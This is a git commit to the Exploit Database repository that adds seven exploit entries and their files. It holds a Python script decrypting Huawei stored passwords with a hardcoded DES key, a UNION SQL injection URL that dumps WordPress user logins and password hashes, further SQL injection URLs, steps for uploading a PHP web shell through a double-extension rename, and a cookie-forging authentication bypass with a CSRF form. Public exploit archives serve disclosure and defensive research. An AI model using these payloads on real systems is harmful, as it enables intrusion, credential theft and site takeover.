DB: 2015-08-31
7 new exploits
This commit is contained in:
Offensive Security
parent
4fe29b09c1
commit
b0a05de4d0
8 changed files with 159 additions and 0 deletions
|
|
@ -34311,6 +34311,7 @@ id,file,description,date,author,platform,type,port
|
|||
37995,platforms/asp/webapps/37995.txt,"SolarWinds Orion IP Address Manager (IPAM) 'search.aspx' Cross Site Scripting Vulnerability",2012-10-31,"Anthony Trummer",asp,webapps,0
|
||||
37996,platforms/windows/remote/37996.txt,"Axigen Mail Server 'fileName' Parameter Directory Traversal Vulnerability",2012-10-31,"Zhao Liang",windows,remote,0
|
||||
37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service Vulnerability",2015-08-28,Vulnerability-Lab,ios,dos,3030
|
||||
37998,platforms/php/webapps/37998.txt,"WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80
|
||||
37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0
|
||||
38000,platforms/php/webapps/38000.txt,"Wolf CMS Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
|
||||
38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80
|
||||
|
|
@ -34324,3 +34325,9 @@ id,file,description,date,author,platform,type,port
|
|||
38011,platforms/php/webapps/38011.txt,"OrangeHRM 'sortField' Parameter SQL Injection Vulnerability",2012-11-07,"High-Tech Bridge",php,webapps,0
|
||||
38012,platforms/php/webapps/38012.txt,"WordPress FLV Player Plugin 'id' Parameter SQL Injection Vulnerability",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0
|
||||
38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22
|
||||
38015,platforms/php/webapps/38015.txt,"AR Web Content Manager (AWCM) cookie_gen.php Arbitrary Cookie Generation Weakness",2012-11-08,"Sooel Son",php,webapps,0
|
||||
38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server 'where' Form Field SQL Injection Vulnerability",2012-11-09,anonymous,multiple,webapps,0
|
||||
38017,platforms/php/webapps/38017.txt,"WordPress Kakao Theme 'ID' Parameter SQL Injection Vulnerability",2012-11-09,sil3nt,php,webapps,0
|
||||
38018,platforms/php/webapps/38018.txt,"WordPress PHP Event Calendar Plugin 'cid' Parameter SQL Injection Vulnerability",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0
|
||||
38019,platforms/php/webapps/38019.txt,"WordPress Eco-annu Plugin 'eid' Parameter SQL Injection Vulnerability",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0
|
||||
38020,platforms/hardware/remote/38020.py,"Multiple Huawei Products Password Encryption Weakness",2012-11-13,"Roberto Paleari",hardware,remote,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
63
platforms/hardware/remote/38020.py
Executable file
63
platforms/hardware/remote/38020.py
Executable file
|
|
@ -0,0 +1,63 @@
|
|||
source: http://www.securityfocus.com/bid/56510/info
|
||||
|
||||
Multiple Huawei products are prone to a weak password encryption weakness.
|
||||
|
||||
Successful exploits may allow an attacker to decrypt stored passwords; this may aid in further attacks.
|
||||
|
||||
The following are vulnerable:
|
||||
|
||||
Huawei Quidway series
|
||||
Huawei CX600 V600R001
|
||||
Huawei CX600 V600R003C00SPC900
|
||||
Huawei ME60 V600R002C07 and prior versions
|
||||
AR 19/29/49 R2207 and prior versions
|
||||
|
||||
from Crypto.Cipher import DES
|
||||
|
||||
def decode_char(c):
|
||||
if c == 'a':
|
||||
r = '?'
|
||||
else:
|
||||
r = c
|
||||
return ord(r) - ord('!')
|
||||
|
||||
def ascii_to_binary(s):
|
||||
assert len(s) == 24
|
||||
|
||||
out = [0]*18
|
||||
i = 0
|
||||
j = 0
|
||||
|
||||
for i in range(0, len(s), 4):
|
||||
y = decode_char(s[i + 0])
|
||||
y = (y << 6) & 0xffffff
|
||||
|
||||
k = decode_char(s[i + 1])
|
||||
y = (y | k) & 0xffffff
|
||||
y = (y << 6) & 0xffffff
|
||||
|
||||
k = decode_char(s[i + 2])
|
||||
y = (y | k) & 0xffffff
|
||||
y = (y << 6) & 0xffffff
|
||||
|
||||
k = decode_char(s[i + 3])
|
||||
y = (y | k) & 0xffffff
|
||||
|
||||
out[j+2] = chr(y & 0xff)
|
||||
out[j+1] = chr((y>>8) & 0xff)
|
||||
out[j+0] = chr((y>>16) & 0xff)
|
||||
|
||||
j += 3
|
||||
|
||||
return "".join(out)
|
||||
|
||||
def decrypt_password(p):
|
||||
r = ascii_to_binary(p)
|
||||
|
||||
r = r[:16]
|
||||
|
||||
d = DES.new("\x01\x02\x03\x04\x05\x06\x07\x08", DES.MODE_ECB)
|
||||
r = d.decrypt(r)
|
||||
|
||||
return r.rstrip("\x00")
|
||||
|
||||
9
platforms/multiple/webapps/38016.txt
Executable file
9
platforms/multiple/webapps/38016.txt
Executable file
|
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/56474/info
|
||||
|
||||
ESRI ArcGIS for Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
ESRI ArcGIS for Server 10.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com:6080/arcgis/rest/services//query?f=json&where=featured%3Dtrue&returnGeometry=true&spatialRel=esriSpatialRelIntersects
|
||||
36
platforms/php/webapps/37998.txt
Executable file
36
platforms/php/webapps/37998.txt
Executable file
|
|
@ -0,0 +1,36 @@
|
|||
# Exploit Title: Wordpress Responsive Thumbnail Slider Arbitrary File Upload
|
||||
# Date: 2015/8/29
|
||||
# Exploit Author: Arash Khazaei
|
||||
# Vendor Homepage:
|
||||
https://wordpress.org/plugins/wp-responsive-thumbnail-slider/
|
||||
# Software Link:
|
||||
https://downloads.wordpress.org/plugin/wp-responsive-thumbnail-slider.zip
|
||||
# Version: 1.0
|
||||
# Tested on: Kali , Iceweasel Browser
|
||||
# CVE : N/A
|
||||
# Contact : http://twitter.com/0xClay
|
||||
# Email : 0xclay@gmail.com
|
||||
# Site : http://bhunter.ir
|
||||
|
||||
# Intrduction :
|
||||
|
||||
# Wordpress Responsive Thumbnail Slider Plugin iS A With 6000+ Active
|
||||
Install
|
||||
# And Suffer From A File Upload Vulnerability Allow Attacker Upload Shell
|
||||
As A Image .
|
||||
# Authors , Editors And Of Course Administrators This Vulnerability To Harm
|
||||
WebSite .
|
||||
|
||||
# POC :
|
||||
|
||||
# For Exploiting This Vulnerability :
|
||||
|
||||
# Go To Add Image Section And Upload File By Self Plugin Uploader
|
||||
# Then Upload File With Double Extension Image
|
||||
# And By Using A BurpSuite Or Tamper Data Change The File Name From
|
||||
Shell.php.jpg To Shell.php
|
||||
# And Shell Is Uploaded . :)
|
||||
|
||||
|
||||
|
||||
<!-- Discovered By Arash Khazaei (Aka JunkyBoy) -->
|
||||
22
platforms/php/webapps/38015.txt
Executable file
22
platforms/php/webapps/38015.txt
Executable file
|
|
@ -0,0 +1,22 @@
|
|||
source: http://www.securityfocus.com/bid/56465/info
|
||||
|
||||
AWCM is prone to an authentication-bypass and multiple security-bypass vulnerabilities.
|
||||
|
||||
Attackers can exploit these vulnerabilities to bypass certain security restrictions, perform unauthorized actions; which may aid in further attacks.
|
||||
|
||||
AWCM 2.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
Authentication Bypass:
|
||||
|
||||
http://www.example.com/awcm/cookie_gen.php?name=\'key\'&content=\'value\'
|
||||
ex) http://targethost/awcm/cookie_gen.php?
|
||||
name=awcm_member&content=123456
|
||||
|
||||
Security Bypass:
|
||||
|
||||
[form action=\"http://www.example.com/awcm/show_video.php?coment=exploit\"
|
||||
method=\"post\"]
|
||||
[input type=\"hidden\" name=\"coment\" value=\'insert
|
||||
uninvited comments 2\' /]
|
||||
[input type=\"submit\" value=\"Submit\"]
|
||||
</form>
|
||||
8
platforms/php/webapps/38017.txt
Executable file
8
platforms/php/webapps/38017.txt
Executable file
|
|
@ -0,0 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/56477/info
|
||||
|
||||
The Kakao theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/wp-content/themes/kakao/sonHaberler.php?ID=-1+union+select+1,2,3,4,5,group_concat%28user_login,0x3a,user_pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wp_users--
|
||||
|
||||
7
platforms/php/webapps/38018.txt
Executable file
7
platforms/php/webapps/38018.txt
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/56478/info
|
||||
|
||||
The PHP Event Calendar plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/wp-content/plugins/Calendar-Script/load-events.php?cid=1[SQL]
|
||||
7
platforms/php/webapps/38019.txt
Executable file
7
platforms/php/webapps/38019.txt
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/56479/info
|
||||
|
||||
The Eco-annu plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/wp-content/plugins/eco-annu/map.php?eid=[SQL]
|
||||
Loading…
Add table
Reference in a new issue